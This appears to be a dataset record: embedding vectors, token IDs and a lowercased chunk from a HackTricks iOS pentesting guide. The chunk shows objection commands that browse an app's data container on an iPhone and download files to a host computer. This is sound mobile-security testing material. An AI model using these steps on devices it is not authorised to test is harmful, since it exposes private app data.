-0.46948590874671936, -0.25929296016693115, 0.002250518649816513, 0.03227819874882698, 0.5829547643661499, -0.03741425275802612, 0.686063826084137, 0.643893837928772, 0.06242699921131134, -0.9047796726226807, 0.5483275055885315, -0.026880424469709396, -0.07672464847564697, 0.5114737153053284, -0.05737791210412979, -0.26562103629112244, -0.14039981365203857, 0.2949138283729553, -0.20445413887500763, -0.9108595848083496, -0.8071722388267517, -0.8655958771705627, 0.1563224196434021, -0.08110536634922028, -0.5976089239120483, 0.024619394913315773, 0.222696453332901, -0.21204733848571777, -0.27875804901123047, -0.3753436505794525, 0.3136325478553772, -0.49999770522117615, 0.28936293721199036, -0.559782862663269, 0.007137480657547712, -0.3290584087371826, -0.6524193286895752, 0.142607182264328, -0.09674004465341568, -0.4862443506717682, -0.6978656053543091, 0.5119162201881409, -0.09164547920227051, -0.7425788640975952, -0.028921982273459435, -0.07758983224630356, -0.36952272057533264, 0.13501444458961487, -0.8164911270141602, 0.6261391639709473, 0.44896212220191956, -0.07328471541404724, 0.20414769649505615, -0.43848609924316406, 0.17226509749889374, 0.2968650758266449, -0.49062585830688477, 0.20053423941135406, -0.25202322006225586, 0.45893049240112305, 0.4674781262874603, -0.009082787670195103, -0.10212482511997223, 0.2326265275478363, -0.1593635529279709, -0.9777215719223022, -0.17532400786876678, -0.7580514550209045, 0.15095862746238708, 0.29476234316825867, -0.22478173673152924, -0.19769959151744843, 0.827298104763031, 0.44619879126548767, -0.0048561012372374535, -0.047512441873550415, 0.20602767169475555, 0.5358027219772339, -0.528008222579956, 0.16744089126586914, -0.10326816141605377, 0.077093206346035, -0.30686864256858826, -0.29588961601257324, 0.3874421715736389, -0.31303948163986206, -0.10315681248903275, 0.22565989196300507, -0.1408727616071701, -0.05549471825361252, 0.2213009148836136, 0.07102269679307938, 0.2508520483970642, 0.36748990416526794, 0.17550981044769287, 0.11117937415838242, 0.6509041786193848, -0.8710224628448486, -0.22911076247692108, -0.7514123320579529, -0.3727876543998718, -0.37408676743507385, -0.41459569334983826, 0.2402075231075287, -0.2310754805803299, 0.1103530153632164, -0.2525079846382141, 0.1710049957036972, 0.14104728400707245, -0.05999188497662544, -0.5770938992500305, 0.6319071650505066, 1.4689275026321411, -0.5345352292060852, -0.588294506072998, -0.40241917967796326, 0.28171446919441223, -0.6240406632423401, -0.5868380069732666, 0.42784836888313293, 0.9808177351951599, -0.2874349355697632, -0.34043943881988525, -0.26033422350883484, 0.42533358931541443, 0.8414417505264282, 0.27018657326698303, -0.24545186758041382, -0.030236635357141495, -0.7604575753211975, 1.2867311239242554, -0.06573494523763657, 0.1854645162820816, -0.3765913248062134, -0.30962786078453064, 0.2318214327096939, 0.2423994243144989, -0.5978807806968689, 0.3148285746574402, -0.2731321156024933, -0.10266894847154617, 0.3324047029018402, 0.7646356821060181, 0.02304936572909355, -0.25293493270874023, 0.07452260702848434, -0.13645878434181213, 0.13375575840473175, 0.7159680724143982, 0.4854864776134491, 0.15875279903411865, 0.534198522567749, 0.19179126620292664, -0.8115514516830444, -0.5269650220870972, 0.36078327894210815, 0.05709517002105713, -0.9112342596054077, 0.5932562947273254, -0.18775412440299988, -0.1836460679769516, 0.03974876180291176, -0.24609622359275818, -0.005785190500319004, -0.07462948560714722, -0.06439301371574402, -0.20646941661834717, 0.07530345767736435, 0.8315170407295227, -0.1823194921016693, 0.5627791881561279, 0.6245747208595276, -0.3787603974342346, 0.5691373348236084, 0.21191956102848053, -0.3898918330669403, 0.34457656741142273, 0.9249110221862793, 0.24790900945663452, -0.07553069293498993, 1.0435467958450317, -0.007894589565694332, -0.30054524540901184, 0.2526394724845886, 0.07647863030433655, -1.0201327800750732, 0.4398162364959717, 0.046892937272787094, -0.00965790543705225, -0.2541483938694, -0.03905893489718437, 0.28683432936668396, -0.42689844965934753, 0.16219018399715424, 0.22361764311790466, 0.36798664927482605, -0.7358324527740479, 0.3012983500957489, -0.41097891330718994, 0.8236506581306458, 0.3604882061481476, -0.28738412261009216, -0.6004270911216736, 0.6618143320083618, -0.3149072825908661, 0.8351284265518188, 0.3615035116672516, 0.8400821685791016, 0.3730427920818329, 0.6158574819564819, 0.4783230721950531, -0.3359312415122986, -0.8245453834533691, 0.05285485461354256, -0.4642065465450287, 0.2016676366329193, 0.31592637300491333, -0.5332852005958557, 0.5000461339950562, 0.0972851887345314, -0.07064731419086456, -0.6602537631988525, 0.23909707367420197, -0.8456703424453735, -0.6737851500511169, 0.7023999691009521, -0.030144644901156425, -0.449695348739624, -0.22206121683120728, 0.31884893774986267, 0.25962719321250916, 0.43323326110839844, -0.4246460497379303, -0.15804795920848846, -0.8192364573478699, -0.011914227157831192, -0.15087036788463593, 0.7404857277870178, -0.14862069487571716, -0.21037669479846954, 0.18438296020030975, -1.0040974617004395, -0.545002281665802, 0.0951463058590889, -0.27728909254074097, -0.23757505416870117, 1.1109964847564697, -0.02071298472583294, 0.9263204336166382, 0.3664625287055969, -0.5674170851707458, -0.057270340621471405, 0.011959414929151535, 0.5496370792388916, -0.022284235805273056, 0.5225154161453247, 0.6376433372497559, 0.032867349684238434, -0.08300119638442993, -0.4452623426914215, 1.078169584274292, -0.48524975776672363, 0.08248703926801682, -0.3960436284542084, -0.02446487545967102, -0.7527405619621277, -0.04114324972033501, -0.29288461804389954, -0.1614132821559906, 0.25636520981788635, 0.2879801392555237, -0.9572101831436157, -0.053700968623161316, -0.757514476776123, 0.14203809201717377, -0.25477859377861023, -0.1206846833229065, -0.12652687728405, -0.0748346596956253, 0.24730223417282104, -1.009197473526001, 4.575601100921631, 0.6873694062232971, 0.15758121013641357, 0.37545737624168396, -0.15549957752227783, 0.32271358370780945, 0.920842170715332, -0.7379087805747986, -0.10283561795949936, -0.1306944042444229, 0.20127074420452118, -0.5666924118995667, 0.2543371617794037, 0.1306898593902588, 0.43601348996162415, 0.7118303179740906, -0.6286267042160034, 0.7971057295799255, 0.4653792679309845, -0.7650587558746338, -1.0137382745742798, -0.2979832887649536, -0.3192165791988373, 0.9758700132369995, -0.05126895383000374, 1.056718349456787, 0.18550093472003937, -0.2564082741737366, -0.47941139340400696, 0.024800188839435577, -0.05183406174182892, -0.5568538904190063, 0.36142581701278687, -0.10501326620578766, -0.03911300003528595, -0.204885795712471, -0.027813086286187172, -0.6538392305374146, 0.19992493093013763, 0.4193263351917267, 0.29091116786003113, 0.07903431355953217, 0.44189128279685974, -0.6751836538314819, -0.011527009308338165, 0.3749960958957672, -0.3673422634601593, 0.5934506058692932, 1.2556926012039185, -0.554603636264801, 0.892951488494873, 0.11441157758235931, 0.2906273901462555, -0.02761150896549225, -0.6662716865539551, 0.18115414679050446, -0.12381549179553986, -0.21193253993988037, 0.11208848655223846, 0.14764173328876495, 0.6164736151695251, -0.2296961545944214, 0.37777385115623474, -0.4193355441093445, -0.26137691736221313, 0.8136290311813354, -0.03916199505329132, 0.49279487133026123, -0.2965153455734253, -0.36635923385620117, -0.1121884137392044, -0.4527403712272644, -0.8959433436393738, -0.2630236744880676, 0.8067309260368347, 0.19156643748283386, -0.1933159977197647, 0.3217172920703888, 0.10836146771907806, -0.025439314544200897, -0.24767932295799255, -0.46707361936569214, -1.2766550779342651, 0.05257334187626839, 0.19835716485977173, 0.4088885188102722, -0.3329574465751648, -0.8434744477272034, -0.15949851274490356, 0.2218012511730194, 0.36156952381134033, 0.3286677598953247, -0.7440540790557861, 0.25721219182014465, 0.2802841365337372 ]
[ 1011, 5080, 5806, 10439, 1010, 2029, 2017, 2064, 2224, 2000, 2034, 7020, 2232, 2041, 1997, 1996, 5080, 2007, 1037, 7901, 5806, 1010, 1998, 2059, 7532, 2013, 2115, 3677, 3274, 2000, 2009, 1012, 3098, 1037, 7901, 5806, 2058, 7020, 2232, 2064, 2022, 2589, 2011, 2770, 1996, 3094, 7020, 2232, 1011, 1054, 1026, 6556, 1035, 3417, 1028, 1024, 2334, 15006, 2102, 1024, 2570, 1026, 5310, 18442, 1028, 1030, 1026, 3677, 1035, 3274, 1035, 12997, 1028, 1012, 2006, 1996, 2006, 1011, 5080, 5806, 10439, 2448, 1996, 2206, 3094, 1998, 1010, 2043, 2356, 1010, 4607, 1996, 20786, 1997, 1996, 5796, 2102, 2290, 5310, 1997, 1996, 3677, 3274, 1024, 7020, 2232, 1011, 1054, 19015, 2475, 1024, 2334, 15006, 2102, 1024, 2570, 1031, 10373, 5123, 1033, 2006, 2115, 3677, 3274, 2448, 1996, 2206, 3094, 1998, 1010, 2043, 2356, 1010, 4607, 1996, 20786, 1997, 1996, 7117, 5310, 1997, 1996, 16380, 5080, 1024, 1002, 7020, 2232, 1011, 1052, 19015, 2475, 7117, 1030, 2334, 15006, 24475, 21759, 28495, 2078, 20786, 10128, 2017, 5293, 2115, 20786, 1998, 2215, 2000, 25141, 2009, 2000, 1996, 12398, 10348, 1024, 1015, 1012, 10086, 1996, 5371, 1013, 2797, 1013, 4385, 1013, 3040, 1012, 3413, 21724, 2006, 2115, 7173, 29162, 16380, 5080, 2478, 2019, 2006, 1011, 5080, 5536, 2030, 2478, 18726, 2066, 10882, 23858, 2050, 2030, 2065, 9463, 2475, 1012, 2424, 1996, 3210, 1024, 7117, 1024, 22038, 20348, 20348, 20348, 2595, 1024, 1014, 1024, 1014, 1024, 1024, 1014, 1024, 1014, 1024, 2291, 8911, 1024, 1013, 13075, 1013, 7117, 1024, 1013, 8026, 1013, 14021, 4684, 1024, 22038, 20348, 20348, 20348, 2595, 1024, 16202, 1024, 16202, 1024, 1024, 1014, 1024, 1014, 1024, 4684, 5310, 1024, 1013, 13075, 1013, 4684, 1024, 1013, 8026, 1013, 14021, 2509, 1012, 2689, 22038, 20348, 20348, 20348, 2595, 2000, 1013, 15488, 2595, 2581, 8029, 2102, 14702, 2072, 2475, 2213, 1006, 2029, 2003, 1996, 23325, 2098, 20786, 10348, 1007, 1018, 1012, 3828, 1998, 6164, 2850, 2696, 4651, 3597, 7685, 2075, 10439, 2951, 6764, 3081, 7020, 2232, 1998, 8040, 19707, 2057, 2113, 2085, 1010, 6764, 2013, 2256, 10439, 2024, 8250, 1999, 1996, 2951, 14176, 1012, 2017, 2064, 2085, 3432, 8756, 1996, 2951, 14176, 2007, 16985, 1998, 4139, 2009, 2013, 1996, 5080, 2007, 8040, 2361, 1024, 18059, 1024, 1066, 7117, 1001, 16985, 1039, 2480, 2615, 2546, 1013, 1056, 8737, 1013, 2951, 1012, 1056, 2290, 2480, 1013, 2797, 1013, 13075, 1013, 4684, 1013, 16143, 1013, 2951, 1013, 4646, 1013, 1022, 2278, 2620, 2063, 2581, 15878, 2692, 1011, 4647, 2683, 2497, 1011, 24125, 2497, 1011, 1022, 12879, 2620, 1011, 1022, 2546, 24087, 16086, 15878, 2692, 2575, 2683, 2509, 11514, 27406, 1024, 1066, 7117, 1001, 6164, 1002, 8040, 2361, 1011, 1052, 19015, 2475, 7117, 1030, 2334, 15006, 2102, 1024, 1013, 1056, 8737, 1013, 2951, 1012, 1056, 2290, 2480, 1012, 2478, 2065, 4609, 8758, 10128, 4609, 8758, 2003, 1037, 26458, 4646, 2008, 2064, 2022, 2109, 2005, 2195, 2477, 1006, 2039, 18570, 1013, 8816, 2075, 6764, 2426, 2068, 1007, 1012, 2178, 26458, 6994, 2005, 2023, 3800, 2003, 29464, 2595, 24759, 5686, 2099, 1012, 3225, 1999, 16380, 2544, 1022, 1012, 1018, 1010, 6207, 2038, 7775, 1996, 2353, 1011, 2283, 10489, 2000, 3229, 2000, 1996, 4646 ]
hack_tricks
436.txt
2
sandbox, so tools like ifunbox and iexplorer no longer display / retrieve files from apps installed on the device if the device isn't jailbroken. using objectionwhen you are starting objection ( objection - - gadget com. apple. mobilesafari explorer ) you will find the prompt within the bundle directory. org. owasp. mstg on ( iphone : 10. 3. 3 ) [ usb ] # pwd printcurrent directory : / var / containers / bundle / application / dabf849d - 493e - 464c - b66b - b8b6c53a4e76 / org. owasp. mstg. appuse the env command to get the directories of the app and navigate to the documents directory. org. owasp. mstg on ( iphone : 10. 3. 3 ) [ usb ] # cd / var / mobile / containers / data / application / 72c7aafb - 1d75 - 4fba - 9d83 - d8b4a2d44133 / documents / var / mobile / containers / data / application / 72c7aafb - 1d75 - 4fba - 9d83 - d8b4a2d44133 / documentswith the command file download < filename > you can download a file from the ios device to your host computer and can analyze it afterwards. org. owasp. mstg on ( iphone : 10. 3. 3 ) [ usb ] # file download. com. apple. mobile _ container _ manager. metadata. plistdownloading / var / mobile / containers / data / application / 72c7aafb - 1d75 - 4fba - 9d83 - d8b4a2d44133 /. com. apple. mobile _ container _ manager. metadata. plist to. com. apple. mobile _ container _ manager. metadata. pliststreaming file from device... writing bytes to destination... successfully downloaded / var / mobile / containers / data / application / 72c7aafb - 1d75 - 4fba - 9d83 - d8b4a2d44133 /. com. apple. mobile _ container _ manager. metadata. plist to. com. apple. mobile _ container _ manager. metadata. plistyou can
[ 0.10727787762880325, -0.9980728030204773, -0.30761489272117615, 0.7362971305847168, -0.21619068086147308, -0.30862388014793396, -0.5486752986907959, 0.3131299912929535, 0.471242219209671, 0.9599372148513794, -0.3598006069660187, -0.17209386825561523, 0.5639416575431824, -0.08877422660589218, -0.34152981638908386, -0.5731635093688965, -0.4300784468650818, 0.0712452381849289, -0.29904916882514954, -0.4602830708026886, 0.1620977222919464, 0.7738221883773804, -0.3396976590156555, -1.1969645023345947, -0.366111159324646, 0.5149675607681274, 0.08811575174331665, 0.12524940073490143, 1.0083081722259521, 0.5781651735305786, 0.10160907357931137, -0.28279680013656616, -0.24123507738113403, -0.6070035696029663, 0.31649312376976013, -0.38771501183509827, 1.1608269214630127, -0.2886444330215454, 0.058632370084524155, -0.29027998447418213, 0.25160086154937744, -0.22616834938526154, 0.4239329993724823, -0.8727627992630005, -1.2379634380340576, -0.5752916932106018, -0.28487324714660645, -0.21814879775047302, 0.3057762682437897, 0.29630038142204285, -0.14071927964687347, 0.014974315650761127, -0.4645931124687195, 0.0489250123500824, 0.444396436214447, -0.05284931883215904, -0.43427756428718567, -0.4674222767353058, -0.094650998711586, 0.3169449269771576, 0.022375978529453278, 0.46133723855018616, 0.38615682721138, -0.4950556755065918, -0.051112398505210876, 0.6395125389099121, -0.03993253782391548, -0.4933629035949707, 0.0017941921250894666, -0.5144953727722168, -0.4326987564563751, 0.8683803081512451, -0.26811081171035767, -0.6067365407943726, -0.13241682946681976, -0.6015713810920715, -0.039299968630075455, -0.7516809105873108, 0.517723560333252, 0.9361238479614258, 0.032988183200359344, 1.0362704992294312, 0.05832807347178459, -0.3883632719516754, -0.37539103627204895, 0.05718027055263519, 0.5790464878082275, 0.5587573051452637, 0.07157929241657257, -0.05569570139050484, 0.24045495688915253, 0.49700433015823364, -1.227495551109314, -0.28894445300102234, 0.5409517288208008, 1.2330962419509888, -0.22511200606822968, -0.1348775178194046, 0.27166613936424255, -0.3006581962108612, 0.7481915950775146, 0.8352553844451904, -0.08740226179361343, 0.3339093029499054, -0.14512886106967926, 0.14978671073913574, 0.3287270665168762, -0.8544591069221497, -0.502963125705719, -0.7910994291305542, 0.5204498171806335, 0.21213482320308685, 0.11969979107379913, -0.5285189747810364, -0.5264668464660645, 0.462922066450119, 0.3400944173336029, -0.32260584831237793, -0.2298680692911148, 0.4926249086856842, 0.13968254625797272, -0.45326292514801025, 0.2913428544998169, -0.4588991105556488, 0.1803406924009323, 0.43354424834251404, 0.7824411988258362, 0.7921306490898132, -0.4219151437282562, -0.20849192142486572, -0.5067733526229858, -0.3981357216835022, 0.1613554060459137, 0.5802673101425171, -0.7378911375999451, 0.18411143124103546, 0.5207675695419312, -0.024195551872253418, 0.6643272638320923, -0.8143898248672485, 0.16891290247440338, 0.11986920982599258, -0.16003550589084625, 0.9506763815879822, 0.4011549949645996, -0.07056224346160889, -0.3190818130970001, 0.029215112328529358, -0.41236045956611633, 0.4648052453994751, -0.05150705948472023, 0.5043973922729492, 0.5520000457763672, -0.48449471592903137, -0.21927395462989807, 0.4128027856349945, -0.06534836441278458, 0.13860149681568146, 0.0006551083060912788, -0.027267735451459885, -0.30026009678840637, 0.6448090672492981, -0.4033353328704834, -0.4428444504737854, 0.10755795985460281, 0.35606029629707336, -0.7043827176094055, -0.3004942536354065, -0.12557055056095123, 0.1934071034193039, 0.2800549864768982, 0.19810175895690918, -0.1647462695837021, 0.5378259420394897, 1.5815238952636719, 0.4575435221195221, -0.056316353380680084, -0.30550652742385864, 0.23778021335601807, 0.4699785113334656, -0.5640323162078857, 0.14466428756713867, -0.10352092236280441, 0.5074771046638489, -0.3829427659511566, 0.5559496879577637, -0.11566069722175598, -0.7885454297065735, -0.25389859080314636, -0.6370413899421692, -0.3423343896865845, 0.6780236959457397, -0.733001708984375, 0.5053644776344299, 0.8701331615447998, 0.08483651280403137, -1.247310757637024, -0.45309656858444214, -0.1332230418920517, -1.6862679719924927, -0.7382405400276184, 0.21034885942935944, 0.09732652455568314, 0.35781270265579224, -0.5814181566238403, 0.050505079329013824, 1.107673168182373, 0.40214964747428894, -0.2503909170627594, 0.132271409034729, 0.9690245985984802, 0.5520908832550049, -0.614142656326294, 0.010630094446241856, 0.03915249556303024, 0.04484226554632187, 0.08720646053552628, 0.5495437979698181, -0.3958693742752075, 0.5172828435897827, -0.2166871428489685, 0.724515438079834, 0.6412931084632874, 0.41469424962997437, -0.24742844700813293, 0.22950094938278198, 0.42434826493263245, 0.45924046635627747, -1.0242788791656494, -0.03417833521962166, -0.31015270948410034, 0.7456285953521729, 0.06619154661893845, 1.0584372282028198, 0.16435489058494568, -0.26151543855667114, 0.6850668787956238, 0.27225470542907715, 0.17885668575763702, -0.26175597310066223, -0.46698376536369324, 0.8116041421890259, 0.8598159551620483, 0.11859406530857086, 0.3942735493183136, 0.0954986959695816, -0.066299669444561, 0.24389903247356415, 0.40255361795425415, 0.8023540377616882, -0.7857154607772827, 0.8546128273010254, 0.9981948733329773, -0.4266609251499176, -0.7202308773994446, -0.7062369585037231, 0.7800725102424622, 0.9982839226722717, -0.9683820009231567, -0.9242674112319946, 0.6813836693763733, 0.03199189156293869, -0.3282097280025482, -0.24617598950862885, 0.03943159803748131, 0.6615407466888428, 0.16028420627117157, 0.9224105477333069, -0.09031219780445099, -0.9921485185623169, -0.986937403678894, -0.37896469235420227, -0.8552500605583191, 0.17071713507175446, -0.8024628162384033, -0.06926918774843216, 0.26011496782302856, -0.3352842330932617, 0.48960208892822266, -0.44713303446769714, -0.23534564673900604, 0.4987483322620392, 0.882548987865448, 0.2524435222148895, -0.26547369360923767, 0.015891075134277344, -0.8900508284568787, 0.26121270656585693, 0.8168661594390869, 1.163830280303955, -0.2766628861427307, -0.03615372255444527, -0.5633038282394409, 0.030231600627303123, 0.15692216157913208, -0.3292691111564636, 0.4407384693622589, 0.5020390748977661, 0.27242156863212585, 0.12315469980239868, 0.028672784566879272, 0.01757940463721752, 0.2689523696899414, -0.3607793152332306, -0.3722798824310303, 0.602358877658844, 0.40113258361816406, 0.0545102022588253, 0.6469343900680542, 0.5936456918716431, -0.3788737952709198, 0.6751013994216919, 0.2885872423648834, 0.42146432399749756, -0.5903276205062866, 1.013629674911499, 0.44908756017684937, -0.1820828765630722, -0.22138306498527527, -0.1320626437664032, 0.3839614689350128, -0.12313766032457352, -0.9034035205841064, -0.4730319678783417, -0.18617044389247894, 0.28200840950012207, -0.3626296818256378, -1.361168384552002, 0.5314773321151733, -1.0783329010009766, -0.6391496062278748, -0.4272153973579407, -0.45746085047721863, 0.7902593612670898, 0.025676069781184196, 0.35081034898757935, -0.27760252356529236, -0.5021997094154358, 0.3722204864025116, 0.5958670973777771, 0.24329233169555664, -0.5071235299110413, -0.0032779283355921507, -0.01613341085612774, 0.4054516851902008, 0.9864428043365479, 0.05837275832891464, -0.13859213888645172, 0.04847786948084831, 0.0035322345793247223, -0.44164106249809265, -0.3097412586212158, 0.2584436535835266, 0.07461144030094147, 0.27254217863082886, 0.24078060686588287, -1.1707175970077515, -0.4070918560028076, 0.5627421140670776, 0.2152383029460907, 0.1864422708749771, -0.18922163546085358, 0.4498225748538971, 0.019008783623576164, 0.009813683107495308, -0.7001110315322876, 0.02633601985871792, 0.27513378858566284, 0.2833213806152344, -0.15889102220535278, 0.5141149163246155, -0.1375553160905838, 0.17147058248519897, 0.3023641109466553, -0.6568208932876587, -1.0716708898544312, 0.5794010758399963, 0.08428771048784256, 0.9245708584785461, -0.5000381469726562, 0.020349575206637383, -0.5211247801780701, -0.0870799794793129, 0.5774399638175964, 0.46018922328948975, 0.24220944941043854, -0.19464252889156342, 0.21232114732265472, 0.05981958284974098, -0.5716524124145508, 0.45136716961860657, 0.17999151349067688, 0.08041557669639587, -0.27288833260536194, -1.1542898416519165, -1.0062298774719238, 0.2508176863193512, 0.9026055932044983, 1.4338740110397339, 0.35978010296821594, 0.5925322771072388, 0.08353254199028015, -0.3617262840270996, 0.29386618733406067, -0.6375522613525391, 0.07530168443918228, -0.16887210309505463, 0.6267638206481934, -0.7423074841499329, -0.0018571247346699238, -0.5273206233978271, -0.41526809334754944, -0.5308722853660583, 0.5164065957069397, 0.15818250179290771, -0.08093660324811935, -0.922312319278717, -0.06602533161640167, -0.2176392525434494, -0.33256539702415466, -0.9755277037620544, -0.21393664181232452, 0.05440172180533409, 0.6238625645637512, 0.5569837093353271, -0.22994250059127808, 0.24016281962394714, -0.7224560976028442, 0.18076637387275696, 0.25963470339775085, 0.16520234942436218, -0.6667394042015076, -0.3435835838317871, -0.609305202960968, -0.9898862838745117, 0.9390693306922913, 0.4992617964744568, 0.7164109945297241, 0.23608680069446564, -1.0728341341018677, -0.003241553669795394, 0.7314683198928833, -0.4424597918987274, -0.6803823709487915, -0.11830168217420578, -0.020765462890267372, 0.5165532231330872, 0.7634447813034058, -0.21536985039710999, 0.019406069070100784, 0.21190334856510162, -1.0659621953964233, 0.9343029260635376, -1.1058915853500366, -0.10984748601913452, 0.29803889989852905, 0.029883097857236862, -0.08686111867427826, 0.9784156680107117, -0.6306105256080627, 0.10309760272502899, -0.2079174965620041, -0.003550034947693348, -0.24490565061569214, -0.18870319426059723, 0.5916895866394043, -0.4927712380886078, -0.03633132576942444, 0.3328322768211365, 0.21165728569030762, 0.23265936970710754, 0.6080657839775085, -0.4721788763999939, -0.8472362756729126, 0.08350374549627304, -0.15796901285648346, 0.7174912691116333, -0.15164881944656372, -0.11418697983026505, 0.4795331656932831, -0.4211195111274719, 0.7403176426887512, 0.01578652486205101, 0.23552799224853516, -0.9044426679611206, -0.22654448449611664, -0.1100042462348938, -0.02460288815200329, 0.38921719789505005, 0.3054279088973999, 0.27869826555252075, 0.2219681441783905, -0.18351516127586365, -0.42496827244758606, -0.8950579166412354, -0.726959764957428, -0.5430236458778381, -0.3793609142303467, 0.015697374939918518, -0.14659537374973297, -0.3778306543827057, -0.2828037142753601, -0.3949071764945984, 0.04138327017426491, -0.04269054904580116, 0.06992923468351364, -0.8773840665817261, 0.24311228096485138, -0.8533241748809814, -0.05795430392026901, -0.2758546471595764, 0.8266798853874207, 0.32932835817337036, 0.2519673705101013, -0.020195765420794487, 0.3505083918571472, 0.5545720458030701, -0.5215578079223633, -0.5211790204048157, 0.48737868666648865, 0.8394290804862976, -0.45464298129081726, 0.010934137739241123, 0.26849740743637085, 0.08987542241811752, -0.29090651869773865, -0.10622893273830414, -0.21866032481193542, -0.4173060953617096, -0.8609904646873474, 0.5165230631828308, -0.2037128359079361, 0.027492037042975426, -0.5117891430854797, -0.5772219300270081, 0.12916378676891327, 0.629515528678894, 0.20390835404396057, -0.45599958300590515, 0.5114986300468445, -0.1499493271112442, 0.341730535030365, -0.3363667130470276, -0.4676099121570587, -0.28715553879737854, -0.5553675889968872, -0.23455865681171417, 0.7338868975639343, 0.2673085629940033, -0.18860380351543427, -0.07371139526367188, 0.1390775740146637, -0.06364920735359192, 0.02680175006389618, -0.6586909890174866, -0.5117849707603455, -0.5837367177009583, -0.12484186142683029, -0.4041787385940552, 0.24633991718292236, -0.4410182535648346, 0.1352517157793045, -0.04981869459152222, 0.0024033591616898775, 0.456474632024765, -0.4982452392578125, -0.4026840925216675, 0.038239650428295135, 1.0310267210006714, -0.4264061748981476, -0.0494605116546154, -0.4675472378730774, 1.251902461051941, -0.0003648173878900707, -0.12182468175888062, -0.46232110261917114, -0.024602988734841347, -0.33967265486717224, -1.1544157266616821, 0.001404084381647408, -0.35634279251098633, -0.1528853476047516, -0.6118775010108948, 0.2464999258518219, 0.4656204581260681, -0.39801159501075745, -0.14176136255264282, 0.7562935948371887, 0.04707586020231247, -0.14988096058368683, -0.7857826352119446, 0.6926716566085815, 0.3743949234485626, -0.09571535885334015, 0.03677476942539215, -0.3874116539955139, 0.2988792061805725, -0.24146613478660583, -0.2694628834724426, 0.08154347538948059, -0.4402221739292145, -0.2131962776184082, 0.4297717213630676, -0.015741324052214622, 0.3157424330711365, 0.049106717109680176, -0.8044635057449341, -0.10557384788990021, -0.22943586111068726, -0.2887839078903198, 0.4154469668865204, 0.585232138633728, 0.5915699601173401, 0.10780681669712067, -0.47862645983695984, 0.15267182886600494, 0.002515581203624606, 0.10310927778482437, 0.7432855367660522, 0.06237595155835152, -0.33746054768562317, 1.305833101272583, 0.6145092844963074, -0.7284480929374695, -0.6367907524108887, -0.07376439869403839, -0.1860024482011795, -0.13315372169017792, -0.5715118646621704, -0.20167392492294312, 0.4159281551837921, -0.3825545310974121, -0.01518294494599104, 0.6135449409484863, 0.2596907913684845, 0.21889619529247284, -0.5759977102279663, 0.46688464283943176, 0.06492945551872253, -0.15340489149093628, 0.3671654164791107, -0.7199024558067322, -0.30819568037986755, -0.6531092524528503, -0.3444756865501404, -0.34770339727401733, 0.05634675174951553, 1.0077484846115112, -0.17380329966545105, 0.026687517762184143, 0.054149091243743896, 0.10244376212358475, 1.0885056257247925, 0.013632938265800476, 0.42569130659103394, 0.6554957032203674, 0.12138323485851288, -0.9785717725753784, -0.5375180840492249, 0.11605414748191833, 0.18762415647506714, 0.1698995977640152, -0.8387539386749268, -0.09020594507455826, -0.0884517952799797, 0.4573521316051483, 0.13185693323612213, -0.7101637721061707, -1.0603127479553223, -0.6822558045387268, 0.09988006204366684, -0.3451760709285736, 0.013455087319016457, 0.024730971083045006, 0.3752897083759308, -0.02144443430006504, -0.4863109886646271, -0.0015088459476828575, 0.5613117814064026, -0.22793109714984894, -0.0157383531332016, -0.8546286225318909, 0.22289159893989563, -0.5071711540222168, -0.7498109340667725, -0.06584638357162476, 0.13602927327156067, 0.03754444420337677, -0.6663131713867188, -0.19178272783756256, 0.04845242202281952, -0.7506459355354309, 0.9879679679870605, -0.8144114017486572, -0.5236268639564514, -0.5726217031478882, -0.8266674280166626, 0.6628943681716919, 0.821115255355835, -0.347150057554245, 0.06831397861242294, 0.22307464480400085, 0.34401583671569824, 0.22839966416358948, -1.0533217191696167, 0.02295631356537342, -0.14975103735923767, 0.44450289011001587, 0.1834876388311386, 0.44271254539489746, -0.20755034685134888, 0.209511861205101, -0.08207231014966965, -1.0177173614501953, -0.35336068272590637, -0.6126071214675903, -0.15789838135242462, -0.09259768575429916, 0.15828260779380798, -0.2891162037849426, 0.9249626994132996, 0.3310483992099762, 0.33904409408569336, -0.7938313484191895, 0.5188499689102173, 0.48297369480133057, -0.0766962468624115, -0.17066596448421478, 0.1461964100599289, 0.12045849114656448, 0.49029678106307983, 0.04713232070207596, 0.19193747639656067, -0.40609192848205566, 0.37493017315864563, -0.5527104735374451, -0.388483464717865, -0.6640589833259583, -0.3513391315937042, 0.45234915614128113, 0.35755476355552673, 0.10729838162660599, 0.5270350575447083, 0.002612154232338071, 0.1702418029308319, -0.691068708896637, 0.5866789817810059, -1.0991435050964355, -0.24171002209186554, 0.051236968487501144, -0.2529960870742798, -0.4383993148803711, -0.4147893488407135, -0.577069878578186, 0.026283955201506615, 0.02024788036942482, -0.17518816888332367, -0.6287399530410767, -0.028663866221904755, -0.06980905681848526, 0.8493080139160156, -0.7862257957458496, -0.22221486270427704, -0.3811274766921997, 0.17064812779426575, -0.5598568320274353, -0.9820778369903564, 0.23676259815692902, 0.8799331784248352, 0.434035986661911, -0.6549991965293884, -0.8297094106674194, -0.0798090398311615, -0.1194680780172348, 0.39831772446632385, 1.0399261713027954, 0.017611658200621605, -1.009319543838501, 0.512037992477417, -0.44833505153656006, 0.3539122939109802, -0.22172369062900543, -0.5057782530784607, 0.5197985768318176, -0.2548675239086151, -0.14763066172599792, 0.3913883566856384, 0.18232442438602448, -0.3360742926597595, 0.5512111783027649, 0.13583619892597198, 0.2300301343202591, -0.7739206552505493, 0.26581960916519165, 0.06844868510961533, 0.405500203371048, 0.49395087361335754, 0.026800237596035004, -0.4263494312763214, 0.6494005918502808, 0.52552330493927, -0.8885024189949036, 0.20938873291015625, 0.6733272075653076, -0.018873240798711777, -0.04575750604271889, -0.2232571393251419, -0.3264029622077942, -0.14163126051425934, 0.07409379631280899, -0.6035178303718567, 0.3356504738330841, -0.3940001130104065, -0.3762965202331543, -0.2317122370004654, -0.4798445403575897, 1.0635175704956055, -0.9323649406433105, 0.9012088775634766, -0.30425170063972473, -0.25071531534194946, 0.17551745474338531, 0.25647497177124023, -0.6677869558334351, 0.8609160780906677, 0.3097134530544281, 0.7578942179679871, -0.6458746790885925, 0.597433865070343, -0.1618208885192871, 0.28036755323410034, 0.2736651301383972, -0.21720349788665771, -0.34652096033096313, -0.08162180334329605, -0.00448688305914402, -0.004366934299468994, -0.25692325830459595, -0.18351779878139496, 0.4500517249107361, 0.044660601764917374, 0.3149925768375397, -1.3059871196746826, 0.46118807792663574, -0.6309157609939575, 0.728647768497467, -0.5068759322166443, 0.32597965002059937, 0.1378181129693985, -0.2288552075624466, -0.3007713556289673, 1.1462280750274658, -0.14568409323692322, 